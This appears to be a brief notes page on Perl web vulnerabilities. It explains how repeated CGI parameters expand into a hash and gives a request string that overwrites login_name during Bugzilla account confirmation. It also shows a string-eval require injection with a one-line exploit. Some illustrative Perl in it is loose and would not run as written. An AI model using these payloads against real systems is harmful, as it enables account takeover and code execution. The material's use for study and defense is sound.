Skip to content

Perl

Perl

CGI

Lists

CGI when given mutable parameters (ex. index.cgi?foo=1&foo=2&bar=a&bar=b) will return a list.

When using a list as a parameter in a hash table 

@list = ('f', 'lol', 'wat');
$hash = {'a' => 'b',
		 'c' => 'd',
		 'e' => @list};
print $hash;
{'a' => 'b',
'c' => 'd',
'e' => 'f',
'lol' => 'wat'};

In the example below the realname parameter when given mutable values will be made as a list. This can be used to overwrite the login_name of the hashtable.

Example:

my $otheruser = Bugzilla::User->create({
	login_name => $login_name, 
	realname => $cgi->param('realname'), 
	cryptpassword=> $password})


a=confirm_new_account&t=[REGISTRATION_TOKEN]&passwd1=Password1!&passwd2=Password1!&realname=Lolzor&realname=login_name&[email protected]

my $otheruser= Bugzilla::User->create({
	login_name=> $login_name,
	realname=> 'Lolzor',
	login_name=> '[email protected]'
	cryptpassword=> $password });

Code Injection

http://modernperlbooks.com/mt/2012/10/code-injection-with-eval-require.html

Sample Code:

package Some::Loader;

use strict;
use warnings;

sub import
{
    my $class = shift;

    for my $module (@_)
    {
        eval "require $module;"
    }
}

1;

Sample Exploit:

perl -MSome::Loader='vars; exit' -E 'say "Hello, world!"'